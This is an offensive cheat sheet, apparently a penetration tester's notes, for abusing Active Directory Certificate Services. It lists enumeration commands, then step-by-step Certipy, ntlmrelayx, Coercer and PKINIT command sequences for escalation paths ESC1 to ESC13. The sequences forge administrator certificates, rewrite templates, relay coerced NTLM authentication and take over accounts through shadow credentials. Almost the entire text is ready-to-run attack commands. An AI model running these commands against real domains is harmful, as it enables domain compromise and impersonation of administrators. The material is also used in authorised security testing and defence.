Enumeration

NetExec

Find PKI Enrollment Services (certificate authorities) and certificate template names in Active Directory

# Enumerate enrollment services (CAs) and certificate template names over LDAP
nxc ldap ip -M adcs -u username -p password

Certipy

Search for vulnerable certificate templates

# Report only enabled templates that certipy flags as vulnerable; -stdout prints the
# report instead of writing the text/json output files
certipy find -stdout -enabled -vulnerable -dc-ip ip -target dc -u username -p password

Certify

Search for vulnerable certificate templates

# Windows (C#) counterpart of `certipy find -vulnerable`; run from a domain-joined host
Certify.exe find /vulnerable

Attacks

ESC1

# ESC1 via a fresh machine account: create the account (only works while the user is
# still allowed to add machine accounts), then enroll with it in the vulnerable
# template, supplying the target's UPN in the SAN
addcomputer.py -computer-name computer_name -computer-pass computer_password domain/username:password
certipy req -dc-ip ip -ca ca -target domain -template template -upn administrator -u computer_name -p computer_password

Or

# ESC1 directly with the compromised user's own credentials
certipy req -dc-ip ip -ca ca -target domain -template template -upn administrator -u username -p password

If `certipy find` shows `Minimum RSA Key Length : 4096` for the template, the request must use a key of that size: add `-key-size 4096` to `certipy req`.

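# Request with a 4096-bit key when the template enforces that minimum
certipy req -dc-ip ip -ca ca -target domain -template template -upn administrator -key-size 4096 -u username -p password
# Authenticate with the issued certificate. -u must be the identity contained in the
# certificate (administrator here), not the account that requested it; certipy
# rejects a username that does not match the certificate
certipy auth -pfx administrator.pfx -domain domain -u administrator -dc-ip ip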

ESC3

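# ESC3 step 1: enroll in the template that grants the Certificate Request Agent EKU;
# the result is saved as username.pfx
certipy req -ca ca -target domain -template template -u username -p password
# step 2: use that agent certificate (-pfx, the file from step 1) to enroll on behalf
# of the target in a template that accepts agent-signed requests (User here)
certipy req -ca ca -target domain -template User -on-behalf-of 'domain\administrator' -pfx pfx_file -u username -p password
# step 3: authenticate as the target
certipy auth -dc-ip ip -pfx administrator.pfx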

ESC4

# ESC4: overwrite the template configuration so the template becomes ESC1-vulnerable.
# -save-old writes the current configuration to a JSON file; restore it when done
# (certipy template ... -configuration <saved json>) so the template is not left open
certipy template -dc-ip ip -template template -save-old -u username -p password
# enroll with the now-vulnerable template, then authenticate as the target
certipy req -ca ca -target dc -template template -upn administrator -dc-ip ip -u username -p password
certipy auth -dc-ip ip -domain domain -u administrator -pfx administrator.pfx

ESC6

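# ESC6: the CA accepts a caller-supplied SAN for any template, so a low-privileged
# user can request a certificate carrying the target's UPN. Authenticate as the
# compromised user (username@domain), not as administrator -- holding the
# administrator password would make the attack pointless
certipy req -ca ca -target domain -template template -upn administrator -u username@domain -p password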

ESC7

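# ESC7 (ManageCA on the CA): make the compromised user a certificate officer, then
# enable the built-in SubCA template
certipy ca -ca ca -add-officer username -dc-ip ip -dns-tcp -ns ip -u username@domain -p password
certipy ca -ca ca -enable-template SubCA -dc-ip ip -dns-tcp -ns ip -u username@domain -p password
# Request a SubCA certificate with the TARGET's UPN in the SAN (not the user's own,
# otherwise the final certificate grants no new privilege). The request is normally
# denied and left pending: save the private key and note the request ID
certipy req -ca ca -target ip -template SubCA -upn administrator@domain -u username@domain -p password
# Approve the pending request with the officer rights, then retrieve the certificate
certipy ca -ca ca -issue-request request_ID -u username@domain -p password
certipy req -ca ca -target ip -retrieve request_ID -u username@domain -p password
# -u must match the identity in the certificate (administrator)
certipy auth -pfx pfx_file -domain domain -u administrator -dc-ip ip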

ESC8

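# ESC8: relay NTLM authentication to the CA's HTTP web enrollment endpoint (the host
# serving /certsrv). --template must be one the relayed account may enroll in
# (e.g. DomainController when the coerced host is a DC). ntlmrelayx names the saved
# .pfx after the relayed account, so it is the machine certificate here, not
# administrator.pfx
ntlmrelayx.py -t http://domain/certsrv/certfnsh.asp -smb2support --adcs --template template --no-http-server --no-wcf-server --no-raw-server
# Coerce the DC to authenticate back to the relay listener on ws_ip
coercer coerce -l ws_ip -t dc_ip -u username -p password --always-continue
# Authenticate with the relayed certificate (command name fixed: was `certipy-`)
certipy auth -pfx pfx_file -dc-ip ip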

ESC9

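# ESC9 prerequisites: write access over target_username, a template whose
# certificates lack the security extension, and a DC that still maps certificates
# by UPN. Step 1: obtain the target's NT hash through shadow credentials
certipy shadow auto -account target_username -u username@domain -hashes :hash
# Step 2: point the target's UPN at the victim, enroll as the target, then put the
# UPN back (the certificate keeps the administrator mapping)
certipy account update -user target_username -upn administrator -u username@domain -hashes :hash
certipy req -ca ca -template template -target ip -u target_username@domain -hashes :target_hash
certipy account update -user target_username -upn target_username -u username@domain -hashes :hash
# Step 3: authenticate; the certificate now maps to administrator
certipy auth -domain domain -pfx administrator.pfx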

ESC13

# ESC13: enroll in the template whose issuance policy is linked to a privileged group
certipy req -ca ca -target domain -template template -dc-ip ip -key-size 4096 -u username -p password
# Obtain a TGT via PKINIT with that certificate; the linked group is added to the ticket
python3 gettgtpkinit.py -dc-ip ip -v -cert-pfx pfx_file domain/username ccache_file

Resources

Tools